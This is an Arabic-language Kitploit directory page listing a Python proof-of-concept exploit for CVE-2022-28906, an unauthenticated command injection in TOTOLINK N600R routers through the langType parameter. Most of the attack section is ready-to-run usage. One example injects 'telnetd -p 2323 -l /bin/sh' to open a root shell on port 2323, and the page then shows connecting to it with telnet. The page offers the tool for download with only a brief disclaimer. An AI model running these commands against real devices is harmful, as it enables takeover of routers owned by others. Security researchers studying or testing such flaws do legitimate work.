Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-28906-POC — # إثبات مفهوم بلغة بايثون لثغرة حقن أوامر نظام التشغيل غير المصادق عليها في جهاز TOTOLINK N600R، تستغل معامل langType لتنفيذ أوامر عشوائية على الجهاز. | Kitploit
أدوات/GitHubGitHub/finnvle/cve-2022-28906-poc
أمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأمان الأجهزة وإنترنت الأشياء
GitHubfinnvle/cve-2022-28906-poc

CVE-2022-28906-POC

# إثبات مفهوم بلغة بايثون لثغرة حقن أوامر نظام التشغيل غير المصادق عليها في جهاز TOTOLINK N600R، تستغل معامل langType لتنفيذ أوامر عشوائية على الجهاز.

عرض المستودع
1منذ 2 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-28906 PoC

إثبات مفهوم بلغة بايثون لحقن أوامر بدون مصادقة في جهاز TOTOLINK N600R.

Python CVSS

الثغرة

المنتجTOTOLINK N600R
البرنامج الثابتV5.3c.7159_B20190425
النوعحقن أوامر نظام التشغيل (CWE-78)
المعاملlangType
نقطة النهاية/cgi-bin/cstecgi.cgi
CVSS v3.19.8 حرجة

تم اكتشاف أن جهاز TOTOLink N600R بإصدار V5.3c.7159_B20190425 يحتوي على ثغرة حقن أوامر عبر معامل langtype في /setting/setLanguageCfg.

الإعداد

root@kitploit:~
python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# الاستخدام: python3 poc.py <الهدف> <الأمر>
# مثال: python3 poc.py 192.168.68.1 "reboot"
# مثال: python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

python3 poc.py <الهدف> <الأمر>

مثال على إثبات المفهوم

استخدام إثبات المفهوم لتنفيذ أوامر عن بُعد على الهدف لتمكين خدمة /bin/sh على المنفذ 2323

root@kitploit:~
python3 poc.py 192.168.68.1 "telnetd -p 2323 -l /bin/sh"

Successful PoC response

تحقق من النتيجة إذا تم تمكين المنفذ 2323

Nmap showing port 2323 open

الاتصال بالهدف باستخدام telnet عبر المنفذ 2323

root@kitploit:~
telnet 192.168.68.1 2323

Root shell validation

المراجع

  • NVD — CVE-2022-28906
  • CVE Record — CVE-2022-28906
  • CWE-78 — OS Command Injection

إخلاء المسؤولية

يُقدَّم هذا المحتوى كما هو دون أي ضمان. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

تنزيل الأداة